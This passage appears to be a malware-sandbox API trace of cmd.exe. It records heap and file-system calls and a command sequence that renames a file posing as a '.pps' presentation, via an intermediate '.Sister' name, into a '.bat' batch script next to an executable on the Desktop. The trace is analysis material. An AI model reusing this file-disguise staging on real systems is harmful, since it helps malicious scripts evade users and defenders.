ftLastWriteTime.dwLowDateTime=0xf2fedd00, ftLastWriteTime.dwHighDateTime=0x1d5ee24, nFileSizeHigh=0x0, nFileSizeLow=0x10174, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="_s7nB1B.pps", cAlternateFileName="")) returned 1 [0306.414] GetProcessHeap () returned 0x21ed8c70000 [0306.414] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x328) returned 0x21ed8c758a0 [0306.414] GetProcessHeap () returned 0x21ed8c70000 [0306.414] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x328 [0306.414] GetProcessHeap () returned 0x21ed8c70000 [0306.414] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3a870 [0306.414] GetProcessHeap () returned 0x21ed8c70000 [0306.414] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3a870, Size=0x30) returned 0x21ed8d3a870 [0306.414] GetProcessHeap () returned 0x21ed8c70000 [0306.414] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3a870) returned 0x30 [0306.414] GetProcessHeap () returned 0x21ed8c70000 [0306.414] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3a8b0 [0306.414] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45bc0 [0306.415] ??_V@YAXPEAX@Z () returned 0x1 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3a8b0, Size=0x130) returned 0x21ed8d3a8b0 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3a8b0) returned 0x130 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3a9f0 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3a9f0, Size=0x290) returned 0x21ed8d3a9f0 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3a9f0) returned 0x290 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3ac90 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3ac90, Size=0x30) returned 0x21ed8d3ac90 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3ac90) returned 0x30 [0306.415] GetProcessHeap () returned 0x21ed8c70000 [0306.415] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3acd0 [0306.415] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.416] GetProcessHeap () returned 0x21ed8c70000 [0306.416] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45b30 [0306.416] ??_V@YAXPEAX@Z () returned 0x1 [0306.416] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.416] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65e30 [0306.416] FindClose (in: hFindFile=0x21ed8d65e30 | out: hFindFile=0x21ed8d65e30) returned 1 [0306.416] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d66070 [0306.416] FindClose (in: hFindFile=0x21ed8d66070 | out: hFindFile=0x21ed8d66070) returned 1 [0306.417] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe136fd71, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe136fd71, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8d65f50 [0306.417] FindClose (in: hFindFile=0x21ed8d65f50 | out: hFindFile=0x21ed8d65f50) returned 1 [0306.417] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0306.417] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\_s7nB1B.pps", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1229ac0, ftCreationTime.dwHighDateTime=0x1d5e704, ftLastAccessTime.dwLowDateTime=0xf2fedd00, ftLastAccessTime.dwHighDateTime=0x1d5ee24, ftLastWriteTime.dwLowDateTime=0xf2fedd00, ftLastWriteTime.dwHighDateTime=0x1d5ee24, nFileSizeHigh=0x0, nFileSizeLow=0x10174, dwReserved0=0x4, dwReserved1=0x7, cFileName="_s7nB1B.pps", cAlternateFileName="")) returned 0x21ed8d655f0 [0306.417] FindClose (in: hFindFile=0x21ed8d655f0 | out: hFindFile=0x21ed8d655f0) returned 1 [0306.417] malloc (_Size=0x1ff9c) returned 0x21eda39fac0 [0306.419] ??_V@YAXPEAX@Z () returned 0x21eda39fac0 [0306.420] GetProcessHeap () returned 0x21ed8c70000 [0306.420] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bf0 [0306.420] ??_V@YAXPEAX@Z () returned 0x1 [0306.420] ??_V@YAXPEAX@Z () returned 0x1 [0306.420] GetProcessHeap () returned 0x21ed8c70000 [0306.420] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3acd0, Size=0x130) returned 0x21ed8d3acd0 [0306.420] GetProcessHeap () returned 0x21ed8c70000 [0306.420] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3acd0) returned 0x130 [0306.420] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0306.420] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.420] GetFileType (hFile=0x50) returned 0x2 [0306.421] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.421] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0306.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.421] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0306.426] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.426] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.426] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0306.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.426] GetFileType (hFile=0x50) returned 0x2 [0306.426] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.426] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0306.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.427] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0306.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.427] GetFileType (hFile=0x50) returned 0x2 [0306.429] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.429] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.430] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d3a880*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d3a880*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.430] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"_s7nB1B.pps\" \"_s7nB1B.pps.Sister\" ") returned 36 [0306.430] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.431] GetFileType (hFile=0x50) returned 0x2 [0306.431] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.431] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.431] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.431] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x24) returned 1 [0306.432] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0306.432] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.432] GetFileType (hFile=0x50) returned 0x2 [0306.432] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.432] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.433] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.433] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0306.433] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.433] GetFileType (hFile=0x50) returned 0x2 [0306.434] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.434] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.434] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.434] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0306.435] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0306.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.435] GetFileType (hFile=0x50) returned 0x2 [0306.435] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.435] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.435] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.435] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0306.436] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0306.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.436] GetFileType (hFile=0x50) returned 0x2 [0306.436] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.436] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.437] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.437] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0306.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.443] GetFileType (hFile=0x50) returned 0x2 [0306.444] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.444] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.444] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d3aca0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d3aca0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.445] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"_s7nB1B.pps.Sister\" \"_s7nB1B.bat\" ") returned 36 [0306.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.445] GetFileType (hFile=0x50) returned 0x2 [0306.445] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.445] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.445] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x24) returned 1 [0306.446] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0306.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.446] GetFileType (hFile=0x50) returned 0x2 [0306.446] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.446] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0306.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.446] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0306.451] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.453] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.453] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.453] malloc (_Size=0xffce) returned 0x21eda39fac0 [0306.453] ??_V@YAXPEAX@Z () returned 0x21eda39fac0 [0306.454] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.454] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.454] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.454] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.454] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.454] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.454] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.454] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.454] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.454] ??_V@YAXPEAX@Z () returned 0x1 [0306.454] GetProcessHeap () returned 0x21ed8c70000 [0306.454] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa0) returned 0x21ed8d5d780 [0306.454] GetProcessHeap () returned 0x21ed8c70000 [0306.454] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5d780, Size=0x58) returned 0x21ed8d65e30 [0306.454] GetProcessHeap () returned 0x21ed8c70000 [0306.454] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d65e30) returned 0x58 [0306.455] GetProcessHeap () returned 0x21ed8c70000 [0306.455] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x60) returned 0x21ed8d63cb0 [0306.455] GetProcessHeap () returned 0x21ed8c70000 [0306.455] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa0) returned 0x21ed8d5daf0 [0306.455] GetProcessHeap () returned 0x21ed8c70000 [0306.455] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5daf0, Size=0x58) returned 0x21ed8d65a70 [0306.455] GetProcessHeap () returned 0x21ed8c70000 [0306.455] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d65a70) returned 0x58 [0306.455] malloc (_Size=0xffce) returned 0x21eda39fac0 [0306.455] ??_V@YAXPEAX@Z () returned 0x21eda39fac0 [0306.455] GetProcessHeap () returned 0x21ed8c70000 [0306.455] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65f50 [0306.455] GetProcessHeap () returned 0x21ed8c70000 [0306.455] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed948a9c0 [0306.455] _wcsicmp (_String1="_s7nB1B.pps", _String2=".") returned 49 [0306.455] _wcsicmp (_String1="_s7nB1B.pps", _String2="..") returned 49 [0306.455] GetFileAttributesW (lpFileName="_s7nB1B.pps" (normalized: "c:\\users\\fd1hvy\\documents\\_s7nb1b.pps")) returned 0x20 [0306.456] GetProcessHeap () returned 0x21ed8c70000 [0306.456] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94bbd70 [0306.457] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed94bbd80 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.458] SetErrorMode (uMode=0x0) returned 0x0 [0306.458] SetErrorMode (uMode=0x1) returned 0x0 [0306.458] GetFullPathNameW (in: lpFileName="_s7nB1B.pps", nBufferLength=0x7fe7, lpBuffer=0x21eda39fac0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\_s7nB1B.pps", lpFilePart=0xa6cf4fd660*="_s7nB1B.pps") returned 0x25 [0306.458] SetErrorMode (uMode=0x0) returned 0x1 [0306.459] GetProcessHeap () returned 0x21ed8c70000 [0306.459] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed948ac30 [0306.459] _wcsicmp (_String1="_s7nB1B.pps", _String2=".") returned 49 [0306.459] _wcsicmp (_String1="_s7nB1B.pps", _String2="..") returned 49 [0306.459] GetFileAttributesW (lpFileName="_s7nB1B.pps" (normalized: "c:\\users\\fd1hvy\\documents\\_s7nb1b.pps")) returned 0x20 [0306.459] ??_V@YAXPEAX@Z () returned 0x1 [0306.459] malloc (_Size=0xffce) returned 0x21eda39fac0 [0306.459] ??_V@YAXPEAX@Z () returned 0x21eda39fac0 [0306.459] malloc (_Size=0xffce) returned 0x21eda3afaa0 [0306.459] ??_V@YAXPEAX@Z () returned 0x21eda3afaa0 [0306.460] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\_s7nB1B.pps" (normalized: "c:\\users\\fd1hvy\\documents\\_s7nb1b.pps")) returned 0x20 [0306.460] malloc (_Size=0xffce) returned 0x21ed993f900 [0306.460] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0306.460] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\_s7nB1B.pps", fInfoLevelId=0x1, lpFindFileData=0x21ed948a9d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed948a9d0) returned 0x21ed8d65e90 [0306.460] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0306.460] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0306.461] ??_V@YAXPEAX@Z () returned 0x1 [0306.461] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\_s7nB1B.pps" (normalized: "c:\\users\\fd1hvy\\documents\\_s7nb1b.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\_s7nB1B.pps.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\_s7nb1b.pps.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0306.462] FindNextFileW (in: hFindFile=0x21ed8d65e90, lpFindFileData=0x21ed948a9d0 | out: lpFindFileData=0x21ed948a9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1229ac0, ftCreationTime.dwHighDateTime=0x1d5e704, ftLastAccessTime.dwLowDateTime=0xf2fedd00, ftLastAccessTime.dwHighDateTime=0x1d5ee24, ftLastWriteTime.dwLowDateTime=0xf2fedd00, ftLastWriteTime.dwHighDateTime=0x1d5ee24, nFileSizeHigh=0x0, nFileSizeLow=0x10174, dwReserved0=0x0, dwReserved1=0x0, cFileName="_s7nB1B.pps", cAlternateFileName="")) returned 0 [0306.463] GetLastError () returned 0x12 [0306.463] FindClose (in: hFindFile=0x21ed8d65e90 | out: hFindFile=0x21ed8d65e90) returned 1 [0306.464] ??_V@YAXPEAX@Z () returned 0x1 [0306.464] ??_V@YAXPEAX@Z () returned 0x1 [0306.464] ??_V@YAXPEAX@Z () returned 0x1 [0306.464] ??_V@YAXPEAX@Z () returned 0x1 [0306.464] GetProcessHeap () returned 0x21ed8c70000 [0306.464] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d66250 [0306.464] GetProcessHeap () returned 0x21ed8c70000 [0306.464] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95880, Size=0x16) returned 0x21ed8c95700 [0306.464] GetProcessHeap () returned 0x21ed8c70000 [0306.464] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95700) returned 0x16 [0306.464] GetProcessHeap () returned 0x21ed8c70000 [0306.464] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e90, Size=0x20) returned 0x21ed8d639b0 [0306.464] GetProcessHeap () returned 0x21ed8c70000 [0306.464] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d639b0) returned 0x20 [0306.464] GetProcessHeap () returned 0x21ed8c70000 [0306.464] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d610e0 [0306.464] GetProcessHeap () returned 0x21ed8c70000 [0306.464] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d610e0, Size=0xb2) returned 0x21ed93753f0 [0306.465] GetProcessHeap () returned 0x21ed8c70000 [0306.465] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93753f0) returned 0xb2 [0306.465] GetProcessHeap () returned 0x21ed8c70000 [0306.465] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3ae10 [0306.465] GetProcessHeap () returned 0x21ed8c70000 [0306.465] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3ae10, Size=0x30) returned 0x21ed8d3ae10 [0306.465] GetProcessHeap () returned 0x21ed8c70000 [0306.465] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3ae10) returned 0x30 [0306.465] GetProcessHeap () returned 0x21ed8c70000 [0306.465] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3ae50 [0306.465] malloc (_Size=0x1ff9c) returned 0x21eda39fac0 [0306.466] GetProcessHeap () returned 0x21ed8c70000 [0306.466] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9375270 [0306.466] GetProcessHeap () returned 0x21ed8c70000 [0306.466] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9376530 [0306.466] ??_V@YAXPEAX@Z () returned 0x1 [0306.466] malloc (_Size=0x1ff9c) returned 0x21eda39fac0 [0306.466] GetProcessHeap () returned 0x21ed8c70000 [0306.466] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9374af0 [0306.466] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda39fac0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0306.466] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65e90 [0306.467] FindClose (in: hFindFile=0x21ed8d65e90 | out: 